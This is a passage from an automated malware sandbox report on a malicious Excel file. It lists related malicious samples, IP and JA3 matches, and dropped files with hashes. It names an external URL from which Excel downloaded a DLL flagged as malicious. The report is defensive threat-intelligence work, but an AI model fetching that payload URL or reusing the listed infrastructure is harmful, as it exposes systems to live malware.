                                                                                                  https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                                                                                  • 104.18.10.39
                                                                                                  Vessel details.docGet hashmaliciousBrowse
                                                                                                  • 104.18.11.39
                                                                                                  excel.xlsGet hashmaliciousBrowse
                                                                                                  • 104.18.11.39
                                                                                                  excel.xlsGet hashmaliciousBrowse
                                                                                                  • 104.18.10.39

                                                                                                  ASN

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  GD-EMEA-DC-SXB1DEhiytvys.dllGet hashmaliciousBrowse
                                                                                                  • 80.86.91.27
                                                                                                  l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                  • 80.86.91.27
                                                                                                  ymuyks.dllGet hashmaliciousBrowse
                                                                                                  • 80.86.91.27
                                                                                                  INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                  • 80.86.91.27
                                                                                                  hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                  • 80.86.91.27
                                                                                                  INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                  • 80.86.91.27
                                                                                                  jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                  • 80.86.91.27
                                                                                                  s3CRQNulKZ.exeGet hashmaliciousBrowse
                                                                                                  • 217.172.179.54
                                                                                                  DFR2154747.vbeGet hashmaliciousBrowse
                                                                                                  • 85.25.93.233
                                                                                                  r8a97.exeGet hashmaliciousBrowse
                                                                                                  • 62.75.168.106
                                                                                                  NKsplucdAu.exeGet hashmaliciousBrowse
                                                                                                  • 217.172.179.54
                                                                                                  lZVNh1BPxm.exeGet hashmaliciousBrowse
                                                                                                  • 217.172.179.54
                                                                                                  qG5E4q8Cv5.exeGet hashmaliciousBrowse
                                                                                                  • 217.172.179.54
                                                                                                  SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                                                                                  • 217.172.179.54
                                                                                                  990109.exeGet hashmaliciousBrowse
                                                                                                  • 87.230.93.218
                                                                                                  og0gax.dllGet hashmaliciousBrowse
                                                                                                  • 62.138.14.216
                                                                                                  M1OrQwls8C.dllGet hashmaliciousBrowse
                                                                                                  • 62.138.14.216
                                                                                                  https://installforge.net/downloads/?i=IFSetupGet hashmaliciousBrowse
                                                                                                  • 5.175.14.17
                                                                                                  SecuriteInfo.com.Trojan.Dridex.735.5073.dllGet hashmaliciousBrowse
                                                                                                  • 85.25.144.36
                                                                                                  sample.exeGet hashmaliciousBrowse
                                                                                                  • 134.119.76.46
                                                                                                  OVHFRsfk_setup.exeGet hashmaliciousBrowse
                                                                                                  • 54.39.133.136
                                                                                                  hiytvys.dllGet hashmaliciousBrowse
                                                                                                  • 46.105.131.65
                                                                                                  l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                  • 46.105.131.65
                                                                                                  ymuyks.dllGet hashmaliciousBrowse
                                                                                                  • 46.105.131.65
                                                                                                  Client.vbsGet hashmaliciousBrowse
                                                                                                  • 92.222.182.237
                                                                                                  INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                  • 46.105.131.65
                                                                                                  hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                  • 46.105.131.65
                                                                                                  INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                  • 46.105.131.65
                                                                                                  jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                  • 46.105.131.65
                                                                                                  Pioneercon Project Contract.exeGet hashmaliciousBrowse
                                                                                                  • 51.195.53.221
                                                                                                  Outstanding Payments.exeGet hashmaliciousBrowse
                                                                                                  • 51.195.53.221
                                                                                                  Quw3X5oAwe.exeGet hashmaliciousBrowse
                                                                                                  • 51.83.208.157
                                                                                                  H56P7iDwnJ.docGet hashmaliciousBrowse
                                                                                                  • 142.44.230.78
                                                                                                  11998704458248.exeGet hashmaliciousBrowse
                                                                                                  • 54.37.160.157
                                                                                                  Test.HTMGet hashmaliciousBrowse
                                                                                                  • 145.239.131.60
                                                                                                  2143453.exeGet hashmaliciousBrowse
                                                                                                  • 51.83.43.226
                                                                                                  Buran.exeGet hashmaliciousBrowse
                                                                                                  • 158.69.65.151
                                                                                                  https://1drv.ms:443/o/s!BAXL7VqGJe6lg0eKk2MZcT_c29ga?e=Qdftz9F3oESsQIuV76Ppsw&at=9Get hashmaliciousBrowse
                                                                                                  • 87.98.225.159
                                                                                                  http://icapturefilms.com/albino-guppies/paramour-deposition-questions.htmlGet hashmaliciousBrowse
                                                                                                  • 51.81.73.219
                                                                                                  SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                                                                  • 188.165.228.217
                                                                                                  SENTIANLhiytvys.dllGet hashmaliciousBrowse
                                                                                                  • 5.100.228.233
                                                                                                  l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                  • 5.100.228.233
                                                                                                  ymuyks.dllGet hashmaliciousBrowse
                                                                                                  • 5.100.228.233
                                                                                                  INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                  • 5.100.228.233
                                                                                                  hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                  • 5.100.228.233
                                                                                                  INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                  • 5.100.228.233
                                                                                                  jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                  • 5.100.228.233
                                                                                                  anthon.exeGet hashmaliciousBrowse
                                                                                                  • 145.131.21.142
                                                                                                  baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                  • 91.216.141.46
                                                                                                  p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                  • 91.216.141.46
                                                                                                  IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                  • 91.216.141.46
                                                                                                  148wWoi8vI.exeGet hashmaliciousBrowse
                                                                                                  • 91.216.141.46
                                                                                                  plusnew.exeGet hashmaliciousBrowse
                                                                                                  • 145.131.29.142
                                                                                                  List-20200731-79226.docGet hashmaliciousBrowse
                                                                                                  • 5.100.228.16
                                                                                                  LIST-20200731-88494.docGet hashmaliciousBrowse
                                                                                                  • 5.100.228.16
                                                                                                  Rep_20200731.docGet hashmaliciousBrowse
                                                                                                  • 5.100.228.16

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  7dcce5b76c8b17472d024758970a406bSecuriteInfo.com.Exploit.Rtf.Obfuscated.16.18733.rtfGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  PURCHASE ORDER-34002174.docGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtfGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  n#U00b0 761.docGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  swift 0182021.xlsGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  prints-eduardo-bolsonaro.docmGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  New PO.docGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  Recibo de la transaccion.xlsGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  Xeron_Scan2021002111002.docGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  INFO.xlsGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  SWIFT_075.dotmGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  Order-Detail-17534.docGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  Shipping Document PL and BL003534.pptGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  97LTtjcfr6.pptGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  97LTtjcfr6.pptGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  ORDER787-5.xlsGet hashmaliciousBrowse
                                                                                                  • 185.2.4.104
                                                                                                  eb88d0b3e1961a0562f006e5ce2a0b87INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  Document74269.xlsGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  Document74269.xlsGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  SecuriteInfo.com.Heur.15645.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  Statement_1857_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  Statement_9505_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  MSC printouts of outstanding as of 73221_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  Invoice.29002611.docGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  MSC printouts of outstanding as of 64338_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  MSC printouts of outstanding as of 41705_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  printouts of outstanding as of 27212_12_11_2020.xlsmGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37
                                                                                                  Inv.Docum.559488870.docGet hashmaliciousBrowse
                                                                                                  • 77.220.64.37

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                  Process:C:\Windows\System32\DWWIN.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):914
                                                                                                  Entropy (8bit):7.367371959019618
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                                                                                                  MD5:E4A68AC854AC5242460AFD72481B2A44
                                                                                                  SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                                                                                                  SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                                                                                                  SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                  Category:dropped
                                                                                                  Size (bytes):58936
                                                                                                  Entropy (8bit):7.994797855729196
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                  MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                  SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                  SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                  SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):893
                                                                                                  Entropy (8bit):7.366016576663508
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                  Process:C:\Windows\System32\DWWIN.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):252
                                                                                                  Entropy (8bit):3.09723161333692
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:kK/Y/zLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:MLutWOxSW0zeYrsMlU/
                                                                                                  MD5:C22617C758D8479BC07705046A3E1F74
                                                                                                  SHA1:414D5ADF1D45AFF551B345E5C5B435CADABEB779
                                                                                                  SHA-256:81F651EAE53E8A7700B52F07C05ED1F0704820FD127400E90B4C85FBF251FE52
                                                                                                  SHA-512:AF53E4248312A0CB642D796355F98DC240AF2CB1468D3BA9860E2743B0F7A81C5A85BA643AF98D9C346025B805F840ABEA3E5F9A35B865ED28B9B463B0E6F314
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: p...... ....j....O......(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):326
                                                                                                  Entropy (8bit):3.1112233609404805
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:kKySwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:QkPlE99SNxAhUegeT2
                                                                                                  MD5:502AEDEF8DFA3FEC7CCDF3759D8AF692
                                                                                                  SHA1:9546A9811DDD252E6DCE821867F6F042588950A8
                                                                                                  SHA-256:6CE7B794F9F09BA38B23E918981879897FDCD52732077FA781F1E932250FADFE
                                                                                                  SHA-512:D6D093435170D72D32A585E791EE45811BBD9467237EDB030ED977992ACA630F198905D2FC4870351F77755A0247CD477BCDB23EB3BB3EE7C4A16FB714D8047A
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: p...... ........)s......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):252
                                                                                                  Entropy (8bit):3.008649533985198
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:kkFklbswfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKCliBAIdQZV7eAYLit
                                                                                                  MD5:19EE278DE02F341DCA6C6C435687B9F8
                                                                                                  SHA1:17EFB39918AEE0A6D38A83FBA433F768CEF4B029
                                                                                                  SHA-256:190B88837CE155A84FF5340CD6D8CFE9F43E29EBBE7576A1F1A5480B391149CE
                                                                                                  SHA-512:DBF4BFFC23917E6E1F87AF51F5D5F5B96F531649C11996EA57A9FA9182C909E43CDDCEDBA620AA3FA3A3796A3A1E5DD22541DF365AC1905236E7B6D5AF65B670
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: p...... ....`.....C.....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zip
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:downloaded
                                                                                                  Size (bytes):318976
                                                                                                  Entropy (8bit):7.117750209248663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:ZH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:x9O02Srnh0qEJC+Y218jdN
                                                                                                  MD5:D3822DAB21FE64DD3695220DB7F46BED
                                                                                                  SHA1:C21D6B44020BD678970FDB0FAF3BE4CB984EA663
                                                                                                  SHA-256:2A4481F10B4459EA382A05F9DB4BA9922B313418DF5380CEB44C3DD5B5B8A459
                                                                                                  SHA-512:B28AD644D0F9F0849CAFC6C98B184A0A4B074D65EAA9A53CD9BD6A40706C0BFAC707D6279181080B4B74607BDEEDC8AE266FD902651C72CE54B30F91FE4DD3E2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 37%
                                                                                                  IE Cache URL:https://www5.ritamartins.pt/d4bfa7nne.zip
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`z._...........!...2.z...`.......&.......@...............................@..........................................................|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B1B8D09.png
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 363 x 234, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2653
                                                                                                  Entropy (8bit):7.818766151665501
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
                                                                                                  MD5:30D3FFA1E30B519FD9B1B839CC65C7BE
                                                                                                  SHA1:1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
                                                                                                  SHA-256:89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
                                                                                                  SHA-512:88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
                                                                                                  Malicious:false
                                                                                                  Preview: .PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BAE4728.emf
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1408
                                                                                                  Entropy (8bit):2.270567557934206
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                                                                                                  MD5:40550DC2F9D56285FA529159B8F2C6A5
                                                                                                  SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                                                                                                  SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                                                                                                  SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                                                                                                  Malicious:false
                                                                                                  Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_09d85b79\Report.wer
                                                                                                  Process:C:\Windows\System32\DWWIN.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17342
                                                                                                  Entropy (8bit):3.709447479035952
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:K4eJBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOBR:K6BKzFCEuhTlyZVaPhVaJa5GG
                                                                                                  MD5:68FF750198C1A16387D14A9CFD7D777A
                                                                                                  SHA1:CAEA0EF0F773BF702966D9EE44755CBDB30BAC31
                                                                                                  SHA-256:8A86CC19009D7EE571F2A158BF51B5887AE26AB7A679827BF741A48AA6D81387
                                                                                                  SHA-512:3D37E64A1B10D1F3AD25A99C3C1F8FCE18C271C7A91872805F34052A2A7AD5EA8ED0CAA3CFEF6792836173DC7CF4497E94793BFCEE7311A94899F2D4EFDAE0EE
                                                                                                  Malicious:false
